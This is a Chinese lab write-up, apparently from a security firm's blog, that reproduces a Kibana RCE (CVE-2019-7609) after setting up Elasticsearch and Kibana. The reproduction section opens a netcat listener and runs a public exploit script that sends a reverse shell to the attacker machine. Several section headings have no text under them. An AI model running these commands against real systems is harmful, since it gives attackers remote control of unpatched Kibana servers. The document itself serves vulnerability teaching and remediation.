未授权访问漏洞之Kibana
0x01 漏洞简述
0x02 知识扩展
0x03 风险等级
0x04漏洞详情
0x05 影响版本
0x06漏洞验证
Elasticsearch-6.5.4
攻击机:Kaki 5.5.0
wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.5.4-linux-x86_64.tar.gz
elasticsearch- 6.5.4-linux-x86_64.tar.gz
tar -xzvf elasticsearch-6.5.4-linux-x86_64.tar.gz
mv elasticsearch-6.5.4 /usr/local/ #拷贝到/usr/local 下
查看elasticsearch-6.5.4
apt-get install openjdk-11-jre-headless
java -version
sudo adduser es
vi config/elasticsearch.yml
编辑node.name 名称
node.name: node-1
path.data:/usr/local/elasticsearch-6.5.4/data
path.logs:/usr/local/elasticsearch-6.5.4/logs
network.host: 0.0.0.0
端口未9200去掉前面的注释
http.port: 9200
支持跨域
http.cors.enabled: true
当设置允许跨域,默认为*,表示支持所有域名
http.cors.allow-origin: "*"
vi /etc/security/limits.conf
es soft nproc 4096
es hard nproc 4096
vim /etc/sysctl.conf
vm.max_map_count=655360
sudo chown -R es:es /usr/local/elasticsearch-6.5.4/
./bin/elasticsearch
打开url http://192.168.1.1212:9200/
curl -O https://artifacts.elastic.co/downloads/kibana/kibana-6.5.4-linux-x86_64.tar.gz
sudo tar -zxvf kibana-6.5.4-linux-x86_64.tar.gz
sudo mv kibana-6.5.4-linux-x86_64 /usr/local/
cd /usr/local/
ls
进入kibana-6.5.4-linux-x86_64目录
修改配置文件
vi config/kibana.yml
172.16.16.212
http://172.16.16.212:9200
我们先开启elasticsearch 在/usr/local/elasticsearch-6.5.4 输入./bin/ elasticsearch
url http://172.16.16.212:9200/
https://putty.en.softonic.com/
0x07 漏洞复现
http://172.16.16.212:5601/app/kibana#/
https://github.com/LandGrey/CVE-2019-7609
sudo nc -lvvp 6666
sudo python CVE-2019-7609-kibana-rce.py -u 172.16.16.212:5601 -host 172.16.16.220 -port 6666 –shell
-u 后面加的是目标靶机和端口号
-host 是我们的攻击机
0x08 修复建议
https://www.elastic.co/cn/downloads/kibana
https://blog.csdn.net/hellowidow_2020/article/details/78545937
iptables -A INPUT -s x.x.x.x -p tcp --dport 11211 -j ACCEPT
如果您遇到网络安全问题
欢迎致电:0991-8156363
或发送至:[email protected]
新疆海狼科技,您身边的网络安全助理
新疆海狼科技有限公司
专业的安全服务提供商。
Official Account
更多资讯请关注
新疆海狼科技专业版公号
“海狼风暴团队”
海狼风暴团队
因为专注,所以专业。
Official Account
了解更多网络安全态势
新疆互联网应急中心
定期发布本地网络安全情况通报,为我区公共互联网、重要政府部门、骨干运营企业、重要信息行业提供计算机网络安全的监测、预警、通报、处置等技术支撑。
Official Account
点个
在看
你最好看